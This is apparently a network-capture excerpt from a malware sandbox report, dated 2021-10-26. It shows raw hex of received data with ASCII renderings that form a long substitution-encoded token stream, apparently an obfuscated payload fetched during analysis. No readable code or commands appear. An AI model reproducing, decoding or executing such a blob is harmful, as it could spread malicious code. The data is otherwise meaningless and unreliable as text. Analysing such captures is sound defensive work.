                                                                                                2021-10-26 15:34:21 UTC1113INData Raw: 53 20 54 54 4f 20 53 20 50 70 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 54 4d 4d 20 53 20 50 6e 20 53 20 54 53 4f 20 53 20 54 53 70 20 53 20 69 67 20 53 20 70 50 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 70 20 53 20 55 4f 20 53 20 55 6e 20 53 20 69 67 20 53 20 69 6e 20 53 20 54 53 4d 20 53 20 69 6e 20 53 20 69 6e 20 53 20 55 70 20 53 20 54 53 55 20 53 20 70 70 20 53 20 54 53 4f 20 53 20 54 53 50 20 53 20 4f 55 20 53 20 55 6e 20 53 20 50 70 20 53 20 69 6e 20 53 20 54 53 4d 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 69 20 53 20 6e 53 20 53 20 4f 53 20 53 20 55 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 70 6e 20 53 20 70 55 20 53 20 54 4d 53 20 53 20 70 50 20 53 20 54 4d 54 20 53 20 6e 55 20 53 20 55 4d 20 53 20 4f 55 20 53 20 54
                                                                                                Data Ascii: S TTO S Pp S pP S pP S pP S TMM S Pn S TSO S TSp S ig S pP S UT S pP S pP S TSp S UO S Un S ig S in S TSM S in S in S Up S TSU S pp S TSO S TSP S OU S Un S Pp S in S TSM S in S in S Pi S nS S OS S UO S pP S pP S pn S pU S TMS S pP S TMT S nU S UM S OU S T
                                                                                                2021-10-26 15:34:21 UTC1117INData Raw: 20 6e 55 20 53 20 4f 6e 20 53 20 6e 4f 20 53 20 55 69 20 53 20 6e 55 20 53 20 55 54 20 53 20 70 50 20 53 20 70 70 20 53 20 54 54 54 20 53 20 54 54 54 20 53 20 55 53 20 53 20 69 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 4f 20 53 20 54 53 69 20 53 20 6e 4d 20 53 20 55 70 20 53 20 54 53 67 20 53 20 70 50 20 53 20 70 50 20 53 20 69 6e 20 53 20 54 4d 4d 20 53 20 55 70 20 53 20 4f 4f 20 53 20 54 4d 53 20 53 20 70 4f 20 53 20 70 4f 20 53 20 70 50 20 53 20 55 50 20 53 20 69 67 20 53 20 54 53 70 20 53 20 6e 50 20 53 20 70 50 20 53 20 54 53 67 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 67 20 53 20 50 70 20 53 20 55 54 20 53 20 55 54 20 53 20 54 53 69 20 53 20 4f 4f 20 53 20 70 70 20 53 20 69 55 20 53 20 70 4f 20 53 20 54 54 55 20 53 20 50 70 20 53 20 69 4f 20
                                                                                                Data Ascii: nU S On S nO S Ui S nU S UT S pP S pp S TTT S TTT S US S iO S pP S pP S nO S TSi S nM S Up S TSg S pP S pP S in S TMM S Up S OO S TMS S pO S pO S pP S UP S ig S TSp S nP S pP S TSg S pP S pP S TSg S Pp S UT S UT S TSi S OO S pp S iU S pO S TTU S Pp S iO
                                                                                                2021-10-26 15:34:21 UTC1121INData Raw: 20 53 20 54 53 4d 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 6e 20 53 20 55 54 20 53 20 4f 6e 20 53 20 6e 70 20 53 20 70 55 20 53 20 6e 55 20 53 20 55 54 20 53 20 70 50 20 53 20 70 55 20 53 20 54 54 54 20 53 20 69 4f 20 53 20 54 53 67 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 67 20 53 20 55 53 20 53 20 70 4f 20 53 20 6e 54 20 53 20 6e 67 20 53 20 55 55 20 53 20 70 50 20 53 20 54 53 53 20 53 20 70 70 20 53 20 70 6e 20 53 20 6e 55 20 53 20 54 53 69 20 53 20 54 53 4d 20 53 20 54 4d 4d 20 53 20 54 53 4d 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 6e 20 53 20 55 54 20 53 20 69 6e 20 53 20 50 54 20 53 20 55 50 20 53 20 6e 67 20 53 20 69 6e 20 53 20 54 4d 53 20 53 20 55 6e 20 53 20 55 54 20 53 20 54 54 4f 20 53 20 55 50 20 53 20 70 50 20 53 20 70 50
                                                                                                Data Ascii: S TSM S in S in S Pn S UT S On S np S pU S nU S UT S pP S pU S TTT S iO S TSg S pP S pP S pP S ng S US S pO S nT S ng S UU S pP S TSS S pp S pn S nU S TSi S TSM S TMM S TSM S in S in S Pn S UT S in S PT S UP S ng S in S TMS S Un S UT S TTO S UP S pP S pP
                                                                                                2021-10-26 15:34:21 UTC1125INData Raw: 20 53 20 70 55 20 53 20 6e 4d 20 53 20 55 4d 20 53 20 70 6e 20 53 20 55 54 20 53 20 54 53 6e 20 53 20 6e 55 20 53 20 54 53 67 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 6e 20 53 20 54 53 53 20 53 20 70 4f 20 53 20 6e 69 20 53 20 70 4f 20 53 20 54 53 67 20 53 20 70 50 20 53 20 70 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 50 20 53 20 55 55 20 53 20 55 54 20 53 20 54 53 6e 20 53 20 6e 6e 20 53 20 6e 54 20 53 20 4f 6e 20 53 20 6e 69 20 53 20 54 53 53 20 53 20 70 6e 20 53 20 55 4d 20 53 20 55 54 20 53 20 69 6e 20 53 20 54 4d 53 20 53 20 55 50 20 53 20 54 54 54 20 53 20 54 54 4f 20 53 20 54 53 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 69 20 53 20 4f 4f 20 53 20 70 70 20 53 20 69 55 20 53 20 4f 53 20 53 20 54 53 4f 20 53
                                                                                                Data Ascii: S pU S nM S UM S pn S UT S TSn S nU S TSg S pP S pP S pP S nn S TSS S pO S ni S pO S TSg S pP S pO S pP S pP S pP S TSP S UU S UT S TSn S nn S nT S On S ni S TSS S pn S UM S UT S in S TMS S UP S TTT S TTO S TSn S pP S pP S TSi S OO S pp S iU S OS S TSO S
                                                                                                2021-10-26 15:34:21 UTC1128INData Raw: 20 69 67 20 53 20 70 4f 20 53 20 54 54 69 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 67 20 53 20 55 53 20 53 20 70 70 20 53 20 70 70 20 53 20 6e 67 20 53 20 54 54 50 20 53 20 70 70 20 53 20 6e 4f 20 53 20 50 70 20 53 20 6e 55 20 53 20 69 4f 20 53 20 50 50 20 53 20 54 54 55 20 53 20 50 6e 20 53 20 69 4f 20 53 20 70 4f 20 53 20 6e 54 20 53 20 54 54 54 20 53 20 6e 53 20 53 20 55 6e 20 53 20 6e 4f 20 53 20 54 53 70 20 53 20 50 67 20 53 20 69 67 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 54 53 50 20 53 20 54 4d 4d 20 53 20 55 50 20 53 20 50 4d 20 53 20 54 54 4f 20 53 20 54 53 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 55 6e 20 53 20 55 70 20 53 20 6e 4f 20 53 20 69 6e 20 53 20 70 6e 20 53 20 55 6e 20 53 20 6e 69 20 53 20
                                                                                                Data Ascii: ig S pO S TTi S UT S pP S pP S pP S ng S US S pp S pp S ng S TTP S pp S nO S Pp S nU S iO S PP S TTU S Pn S iO S pO S nT S TTT S nS S Un S nO S TSp S Pg S ig S in S in S in S TSP S TMM S UP S PM S TTO S TSn S pP S pP S Un S Up S nO S in S pn S Un S ni S
                                                                                                2021-10-26 15:34:21 UTC1133INData Raw: 69 6e 20 53 20 50 6e 20 53 20 55 54 20 53 20 54 53 70 20 53 20 55 4f 20 53 20 55 55 20 53 20 54 54 4f 20 53 20 69 67 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 55 50 20 53 20 6e 4f 20 53 20 54 53 69 20 53 20 54 53 55 20 53 20 55 69 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 55 6e 20 53 20 55 70 20 53 20 54 54 53 20 53 20 69 6e 20 53 20 54 53 53 20 53 20 55 54 20 53 20 54 4d 53 20 53 20 54 54 54 20 53 20 54 53 6e 20 53 20 55 53 20 53 20 54 54 70 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 4f 20 53 20 54 53 69 20 53 20 55 6e 20 53 20 55 69 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 4f 6e 20 53 20 55 53 20 53 20 55 69 20 53 20 6e 55 20 53 20 55 54 20 53 20 70 50 20 53 20 70 6e 20 53 20 50 50 20 53 20 54 54 54 20 53 20 55 53 20
                                                                                                Data Ascii: in S Pn S UT S TSp S UO S UU S TTO S ig S in S in S in S UP S nO S TSi S TSU S Ui S UT S pP S pP S Un S Up S TTS S in S TSS S UT S TMS S TTT S TSn S US S TTp S pP S pP S nO S TSi S Un S Ui S UT S pP S pP S On S US S Ui S nU S UT S pP S pn S PP S TTT S US
                                                                                                2021-10-26 15:34:21 UTC1137INData Raw: 20 53 20 54 53 50 20 53 20 55 55 20 53 20 54 53 67 20 53 20 6e 67 20 53 20 54 53 50 20 53 20 55 70 20 53 20 54 53 67 20 53 20 6e 6e 20 53 20 54 53 50 20 53 20 55 69 20 53 20 54 53 70 20 53 20 54 54 69 20 53 20 70 50 20 53 20 54 53 70 20 53 20 55 53 20 53 20 70 50 20 53 20 55 55 20 53 20 50 4d 20 53 20 54 53 55 20 53 20 6e 54 20 53 20 6e 53 20 53 20 6e 67 20 53 20 54 54 55 20 53 20 6e 54 20 53 20 55 6e 20 53 20 50 70 20 53 20 6e 4f 20 53 20 6e 70 20 53 20 55 4d 20 53 20 54 53 70 20 53 20 70 70 20 53 20 55 69 20 53 20 6e 6e 20 53 20 50 6e 20 53 20 54 54 50 20 53 20 50 50 20 53 20 54 54 4f 20 53 20 69 4f 20 53 20 54 53 53 20 53 20 69 55 20 53 20 70 70 20 53 20 69 4f 20 53 20 70 55 20 53 20 54 54 54 20 53 20 6e 54 20 53 20 69 55 20 53 20 54 54 50 20 53 20 70
                                                                                                Data Ascii: S TSP S UU S TSg S ng S TSP S Up S TSg S nn S TSP S Ui S TSp S TTi S pP S TSp S US S pP S UU S PM S TSU S nT S nS S ng S TTU S nT S Un S Pp S nO S np S UM S TSp S pp S Ui S nn S Pn S TTP S PP S TTO S iO S TSS S iU S pp S iO S pU S TTT S nT S iU S TTP S p
                                                                                                2021-10-26 15:34:21 UTC1141INData Raw: 53 20 55 54 20 53 20 54 53 50 20 53 20 69 55 20 53 20 50 6e 20 53 20 70 50 20 53 20 54 53 67 20 53 20 50 70 20 53 20 55 54 20 53 20 55 4f 20 53 20 54 54 67 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 67 20 53 20 6e 69 20 53 20 55 4d 20 53 20 54 53 4d 20 53 20 54 53 50 20 53 20 6e 69 20 53 20 55 4d 20 53 20 70 55 20 53 20 70 4f 20 53 20 55 54 20 53 20 54 53 53 20 53 20 55 67 20 53 20 54 54 54 20 53 20 55 53 20 53 20 54 54 70 20 53 20 50 6e 20 53 20 54 53 70 20 53 20 54 54 54 20 53 20 50 53 20 53 20 55 53 20 53 20 6e 4d 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 4d 20 53 20 54 54 6e 20 53 20 55 53 20 53 20 69 4f 20 53 20 70 50 20 53 20 6e 67 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 67 20 53 20 54 54 70 20 53 20 54
                                                                                                Data Ascii: S UT S TSP S iU S Pn S pP S TSg S Pp S UT S UO S TTg S UT S pP S pP S in S in S ig S ni S UM S TSM S TSP S ni S UM S pU S pO S UT S TSS S Ug S TTT S US S TTp S Pn S TSp S TTT S PS S US S nM S in S in S PM S TTn S US S iO S pP S ng S pP S pP S ng S TTp S T
                                                                                                2021-10-26 15:34:21 UTC1145INData Raw: 70 50 20 53 20 6e 4f 20 53 20 54 54 50 20 53 20 55 67 20 53 20 54 53 67 20 53 20 69 6e 20 53 20 54 53 67 20 53 20 55 54 20 53 20 54 53 4d 20 53 20 55 54 20 53 20 50 53 20 53 20 6e 69 20 53 20 54 54 53 20 53 20 6e 67 20 53 20 4f 55 20 53 20 54 54 50 20 53 20 70 50 20 53 20 54 53 67 20 53 20 70 50 20 53 20 70 50 20 53 20 69 6e 20 53 20 50 4d 20 53 20 55 4f 20 53 20 54 54 50 20 53 20 70 50 20 53 20 54 54 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 50 20 53 20 50 4d 20 53 20 4f 55 20 53 20 6e 6e 20 53 20 70 50 20 53 20 54 53 67 20 53 20 70 50 20 53 20 70 50 20 53 20 50 69 20 53 20 4f 55 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 6e 20 53 20 70 70 20 53 20 69 67 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 70 50 20 53
                                                                                                Data Ascii: pP S nO S TTP S Ug S TSg S in S TSg S UT S TSM S UT S PS S ni S TTS S ng S OU S TTP S pP S TSg S pP S pP S in S PM S UO S TTP S pP S TTO S pP S pP S TSP S PM S OU S nn S pP S TSg S pP S pP S Pi S OU S UT S pP S pP S pP S pn S pp S ig S in S in S in S pP S
                                                                                                2021-10-26 15:34:21 UTC1149INData Raw: 53 20 70 55 20 53 20 54 4d 53 20 53 20 70 50 20 53 20 54 4d 53 20 53 20 6e 4d 20 53 20 6e 4f 20 53 20 50 50 20 53 20 50 50 20 53 20 55 54 20 53 20 70 50 20 53 20 54 53 67 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 4d 20 53 20 6e 50 20 53 20 4f 53 20 53 20 54 53 4d 20 53 20 55 6e 20 53 20 69 4f 20 53 20 54 54 53 20 53 20 70 6e 20 53 20 70 6e 20 53 20 70 50 20 53 20 70 6e 20 53 20 6e 70 20 53 20 54 4d 53 20 53 20 54 54 6e 20 53 20 54 53 70 20 53 20 54 53 6e 20 53 20 69 67 20 53 20 54 53 4d 20 53 20 69 6e 20 53 20 69 6e 20 53 20 55 50 20 53 20 6e 54 20 53 20 54 54 54 20 53 20 70 50 20 53 20 4f 6e 20 53 20 70 70 20 53 20 55 50 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 70 55 20 53 20 69 6e 20 53 20 54 54 70 20 53 20 54 54 67 20 53 20 70 50 20 53
                                                                                                Data Ascii: S pU S TMS S pP S TMS S nM S nO S PP S PP S UT S pP S TSg S pP S pP S TSM S nP S OS S TSM S Un S iO S TTS S pn S pn S pP S pn S np S TMS S TTn S TSp S TSn S ig S TSM S in S in S UP S nT S TTT S pP S On S pp S UP S UT S pP S pP S pU S in S TTp S TTg S pP S
                                                                                                2021-10-26 15:34:21 UTC1153INData Raw: 53 50 20 53 20 54 54 4f 20 53 20 6e 4d 20 53 20 69 6e 20 53 20 55 50 20 53 20 70 50 20 53 20 54 53 70 20 53 20 70 6e 20 53 20 70 6e 20 53 20 70 50 20 53 20 70 70 20 53 20 55 69 20 53 20 55 70 20 53 20 54 53 55 20 53 20 54 53 54 20 53 20 6e 70 20 53 20 50 70 20 53 20 55 69 20 53 20 55 53 20 53 20 69 6e 20 53 20 6e 4f 20 53 20 55 55 20 53 20 50 4d 20 53 20 69 55 20 53 20 54 53 4d 20 53 20 54 53 69 20 53 20 50 67 20 53 20 55 55 20 53 20 50 69 20 53 20 6e 69 20 53 20 4f 55 20 53 20 69 4f 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 67 20 53 20 6e 70 20 53 20 50 53 20 53 20 6e 67 20 53 20 54 54 50 20 53 20 6e 54 20 53 20 55 50 20 53 20 69 6e 20 53 20 50 6e 20 53 20 69 55 20 53 20 6e 69 20 53 20 70 70 20 53 20 55 67 20 53 20 6e 70 20 53 20 54 4d 4d 20 53 20 54 54
                                                                                                Data Ascii: SP S TTO S nM S in S UP S pP S TSp S pn S pn S pP S pp S Ui S Up S TSU S TST S np S Pp S Ui S US S in S nO S UU S PM S iU S TSM S TSi S Pg S UU S Pi S ni S OU S iO S in S in S ig S np S PS S ng S TTP S nT S UP S in S Pn S iU S ni S pp S Ug S np S TMM S TT
                                                                                                2021-10-26 15:34:21 UTC1157INData Raw: 69 6e 20 53 20 6e 55 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 67 20 53 20 54 53 67 20 53 20 6e 4f 20 53 20 55 53 20 53 20 54 54 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 67 20 53 20 50 70 20 53 20 55 54 20 53 20 6e 6e 20 53 20 55 50 20 53 20 69 4f 20 53 20 6e 55 20 53 20 55 6e 20 53 20 54 53 70 20 53 20 55 4f 20 53 20 55 55 20 53 20 50 70 20 53 20 50 54 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 55 50 20 53 20 6e 54 20 53 20 54 54 69 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 54 20 53 20 55 50 20 53 20 6e 6e 20 53 20 55 50 20 53 20 69 4f 20 53 20 55 53 20 53 20 69 6e 20 53 20 6e 53 20 53 20 55 67 20 53 20 54 53 70 20 53 20 70 70 20 53 20 55 54 20 53 20 70 50 20 53 20 70 70 20 53 20 55 69 20 53 20 54 53 70 20 53 20 55 50 20
                                                                                                Data Ascii: in S nU S in S in S in S ig S TSg S nO S US S TTO S pP S pP S TSg S Pp S UT S nn S UP S iO S nU S Un S TSp S UO S UU S Pp S PT S in S in S in S UP S nT S TTi S in S in S PT S UP S nn S UP S iO S US S in S nS S Ug S TSp S pp S UT S pP S pp S Ui S TSp S UP
                                                                                                2021-10-26 15:34:21 UTC1160INData Raw: 55 20 53 20 70 55 20 53 20 69 6e 20 53 20 54 53 53 20 53 20 70 6e 20 53 20 55 54 20 53 20 6e 6e 20 53 20 54 53 50 20 53 20 50 70 20 53 20 4f 55 20 53 20 54 54 54 20 53 20 54 53 54 20 53 20 69 6e 20 53 20 50 50 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 53 20 53 20 54 53 50 20 53 20 69 55 20 53 20 54 4d 4d 20 53 20 54 53 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 69 6e 20 53 20 50 54 20 53 20 55 54 20 53 20 54 53 6e 20 53 20 70 55 20 53 20 6e 67 20 53 20 54 54 55 20 53 20 6e 54 20 53 20 50 69 20 53 20 6e 54 20 53 20 54 54 55 20 53 20 69 67 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 6e 20 53 20 6e 4d 20 53 20 6e 4f 20 53 20 50 54 20 53 20 50 4d 20 53 20 54 54 50 20 53 20 54 53 4d 20 53 20 6e 70 20 53 20 54 54 70 20 53 20 54 54 54 20 53 20 50 50 20 53 20 6e 6e
                                                                                                Data Ascii: U S pU S in S TSS S pn S UT S nn S TSP S Pp S OU S TTT S TST S in S PP S in S in S PS S TSP S iU S TMM S TSn S pP S pP S in S PT S UT S TSn S pU S ng S TTU S nT S Pi S nT S TTU S ig S in S in S Pn S nM S nO S PT S PM S TTP S TSM S np S TTp S TTT S PP S nn
                                                                                                2021-10-26 15:34:21 UTC1165INData Raw: 53 70 20 53 20 54 54 54 20 53 20 4f 4f 20 53 20 54 4d 4d 20 53 20 4f 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 55 53 20 53 20 50 6e 20 53 20 54 4d 4d 20 53 20 4f 6e 20 53 20 6e 67 20 53 20 69 4f 20 53 20 6e 53 20 53 20 54 53 4f 20 53 20 6e 53 20 53 20 70 55 20 53 20 69 6e 20 53 20 54 53 53 20 53 20 54 53 4d 20 53 20 54 53 69 20 53 20 54 54 54 20 53 20 70 50 20 53 20 70 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 55 53 20 53 20 50 6e 20 53 20 54 4d 4d 20 53 20 55 4f 20 53 20 6e 4f 20 53 20 54 53 50 20 53 20 50 4d 20 53 20 6e 4f 20 53 20 54 53 67 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 67 20 53 20 50 70 20 53 20 55 54 20 53 20 4f 4f 20 53 20 69 6e 20 53 20 50 54 20 53 20 6e 55 20 53 20 54 53 67 20 53 20 54 53 50 20 53 20 50 70 20 53 20 55
                                                                                                Data Ascii: Sp S TTT S OO S TMM S OO S pP S pP S US S Pn S TMM S On S ng S iO S nS S TSO S nS S pU S in S TSS S TSM S TSi S TTT S pP S pn S pP S pP S pP S US S Pn S TMM S UO S nO S TSP S PM S nO S TSg S pP S pP S TSg S Pp S UT S OO S in S PT S nU S TSg S TSP S Pp S U
                                                                                                2021-10-26 15:34:21 UTC1169INData Raw: 70 20 53 20 6e 4f 20 53 20 69 55 20 53 20 6e 6e 20 53 20 54 54 50 20 53 20 70 55 20 53 20 50 4d 20 53 20 54 4d 54 20 53 20 50 4d 20 53 20 69 6e 20 53 20 54 54 55 20 53 20 69 6e 20 53 20 69 6e 20 53 20 4f 6e 20 53 20 6e 4d 20 53 20 55 69 20 53 20 55 54 20 53 20 55 54 20 53 20 70 50 20 53 20 70 55 20 53 20 69 6e 20 53 20 54 53 53 20 53 20 55 54 20 53 20 54 53 50 20 53 20 6e 70 20 53 20 54 54 4f 20 53 20 69 67 20 53 20 54 53 50 20 53 20 69 55 20 53 20 69 67 20 53 20 54 53 4d 20 53 20 69 6e 20 53 20 69 6e 20 53 20 4f 6e 20 53 20 6e 4f 20 53 20 54 4d 4d 20 53 20 70 4f 20 53 20 55 54 20 53 20 70 50 20 53 20 70 55 20 53 20 69 6e 20 53 20 54 53 53 20 53 20 55 54 20 53 20 54 53 50 20 53 20 6e 70 20 53 20 54 54 4f 20 53 20 69 67 20 53 20 54 53 50 20 53 20 54 53 55
                                                                                                Data Ascii: p S nO S iU S nn S TTP S pU S PM S TMT S PM S in S TTU S in S in S On S nM S Ui S UT S UT S pP S pU S in S TSS S UT S TSP S np S TTO S ig S TSP S iU S ig S TSM S in S in S On S nO S TMM S pO S UT S pP S pU S in S TSS S UT S TSP S np S TTO S ig S TSP S TSU
                                                                                                2021-10-26 15:34:21 UTC1173INData Raw: 67 20 53 20 50 53 20 53 20 6e 53 20 53 20 70 50 20 53 20 55 53 20 53 20 54 53 70 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 53 20 53 20 54 53 70 20 53 20 69 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 55 50 20 53 20 6e 4f 20 53 20 54 53 67 20 53 20 6e 70 20 53 20 6e 55 20 53 20 54 53 67 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 67 20 53 20 50 70 20 53 20 55 54 20 53 20 55 4f 20 53 20 54 53 67 20 53 20 50 54 20 53 20 69 55 20 53 20 4f 4f 20 53 20 69 6e 20 53 20 50 54 20 53 20 55 54 20 53 20 50 69 20 53 20 54 53 70 20 53 20 55 4f 20 53 20 55 50 20 53 20 70 50 20 53 20 50 6e 20 53 20 54 54 55 20 53 20 69 6e 20 53 20 69 6e 20 53 20 55 50 20 53 20 55 53 20 53 20 50 6e 20 53 20 69 4f 20 53 20 6e 4d 20 53 20 6e 4f 20 53 20 54 53 70
                                                                                                Data Ascii: g S PS S nS S pP S US S TSp S in S in S PS S TSp S in S pP S pP S pP S pP S UP S nO S TSg S np S nU S TSg S pP S pP S TSg S Pp S UT S UO S TSg S PT S iU S OO S in S PT S UT S Pi S TSp S UO S UP S pP S Pn S TTU S in S in S UP S US S Pn S iO S nM S nO S TSp
                                                                                                2021-10-26 15:34:21 UTC1177INData Raw: 53 20 70 50 20 53 20 55 53 20 53 20 50 50 20 53 20 69 6e 20 53 20 69 6e 20 53 20 54 54 4f 20 53 20 70 70 20 53 20 55 6e 20 53 20 55 70 20 53 20 50 50 20 53 20 50 50 20 53 20 50 70 20 53 20 70 50 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 55 70 20 53 20 54 54 54 20 53 20 50 53 20 53 20 6e 53 20 53 20 70 50 20 53 20 54 54 55 20 53 20 50 50 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 53 20 53 20 54 54 54 20 53 20 70 50 20 53 20 55 50 20 53 20 6e 67 20 53 20 54 54 55 20 53 20 50 67 20 53 20 50 69 20 53 20 6e 6e 20 53 20 6e 6e 20 53 20 54 4d 4d 20 53 20 70 50 20 53 20 70 50 20 53 20 70 70 20 53 20 54 53 4f 20 53 20 54 53 67 20 53 20 50 69 20 53 20 55 50 20 53 20 70 50 20 53 20 69 6e 20 53 20 55 53 20 53 20 69 6e 20 53 20 69 6e 20 53 20 70 50 20 53 20
                                                                                                Data Ascii: S pP S US S PP S in S in S TTO S pp S Un S Up S PP S PP S Pp S pP S UT S pP S pP S Up S TTT S PS S nS S pP S TTU S PP S in S in S PS S TTT S pP S UP S ng S TTU S Pg S Pi S nn S nn S TMM S pP S pP S pp S TSO S TSg S Pi S UP S pP S in S US S in S in S pP S
                                                                                                2021-10-26 15:34:21 UTC1181INData Raw: 20 53 20 55 6e 20 53 20 54 54 54 20 53 20 55 54 20 53 20 4f 6e 20 53 20 54 53 69 20 53 20 70 55 20 53 20 69 6e 20 53 20 69 4f 20 53 20 55 4f 20 53 20 54 54 50 20 53 20 54 54 70 20 53 20 50 54 20 53 20 6e 6e 20 53 20 70 70 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 53 20 53 20 54 53 54 20 53 20 6e 69 20 53 20 54 53 69 20 53 20 54 54 67 20 53 20 55 54 20 53 20 70 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 70 55 20 53 20 69 6e 20 53 20 69 4f 20 53 20 55 6e 20 53 20 54 53 67 20 53 20 70 50 20 53 20 70 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 4f 6e 20 53 20 54 53 69 20 53 20 70 70 20 53 20 54 54 67 20 53 20 70 4f 20 53 20 6e 53 20 53 20 54 53 53 20 53 20 54 54 54 20 53 20 54 53 69 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53
                                                                                                Data Ascii: S Un S TTT S UT S On S TSi S pU S in S iO S UO S TTP S TTp S PT S nn S pp S pP S pP S nS S TST S ni S TSi S TTg S UT S pn S pP S pP S pU S in S iO S Un S TSg S pP S pO S pP S pP S pP S On S TSi S pp S TTg S pO S nS S TSS S TTT S TSi S UT S pP S pP S pP S
                                                                                                2021-10-26 15:34:21 UTC1185INData Raw: 54 20 53 20 69 55 20 53 20 6e 6e 20 53 20 70 70 20 53 20 55 55 20 53 20 55 50 20 53 20 6e 67 20 53 20 69 6e 20 53 20 50 54 20 53 20 55 50 20 53 20 6e 67 20 53 20 50 69 20 53 20 70 50 20 53 20 54 54 53 20 53 20 50 69 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 6e 20 53 20 54 53 4d 20 53 20 55 55 20 53 20 54 53 55 20 53 20 54 54 55 20 53 20 6e 69 20 53 20 54 54 4f 20 53 20 54 53 67 20 53 20 54 53 67 20 53 20 70 50 20 53 20 55 70 20 53 20 55 4f 20 53 20 54 54 55 20 53 20 54 54 50 20 53 20 54 54 6e 20 53 20 70 50 20 53 20 70 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 55 20 53 20 54 54 54 20 53 20 55 54 20 53 20 54 53 70 20 53 20 6e 67 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 67 20 53 20 54 54 70 20 53 20 6e 53 20 53 20 70 6e 20 53 20 6e 67 20
                                                                                                Data Ascii: T S iU S nn S pp S UU S UP S ng S in S PT S UP S ng S Pi S pP S TTS S Pi S in S in S Pn S TSM S UU S TSU S TTU S ni S TTO S TSg S TSg S pP S Up S UO S TTU S TTP S TTn S pP S pn S pP S pP S pP S pU S TTT S UT S TSp S ng S pP S pP S ng S TTp S nS S pn S ng
                                                                                                2021-10-26 15:34:21 UTC1189INData Raw: 20 54 54 55 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 4d 20 53 20 55 55 20 53 20 70 50 20 53 20 54 53 53 20 53 20 55 54 20 53 20 54 54 4d 20 53 20 70 50 20 53 20 55 55 20 53 20 69 4f 20 53 20 50 67 20 53 20 4f 55 20 53 20 54 53 50 20 53 20 69 67 20 53 20 55 70 20 53 20 54 53 53 20 53 20 54 54 4f 20 53 20 54 53 69 20 53 20 70 50 20 53 20 70 50 20 53 20 50 69 20 53 20 55 53 20 53 20 55 54 20 53 20 54 53 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 70 70 20 53 20 54 54 54 20 53 20 70 50 20 53 20 55 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 55 53 20 53 20 50 70 20 53 20 55 70 20 53 20 55 53 20 53 20 6e 6e 20 53 20 6e 53 20 53 20 70 50 20 53 20 70 50 20 53 20 70 55 20 53 20 55 53 20 53 20 4f 55 20 53 20 55 50 20 53 20 50 53 20 53 20 54 53 70 20 53
                                                                                                Data Ascii: TTU S in S in S PM S UU S pP S TSS S UT S TTM S pP S UU S iO S Pg S OU S TSP S ig S Up S TSS S TTO S TSi S pP S pP S Pi S US S UT S TSO S pP S pP S pp S TTT S pP S UO S pP S pP S pP S US S Pp S Up S US S nn S nS S pP S pP S pU S US S OU S UP S PS S TSp S
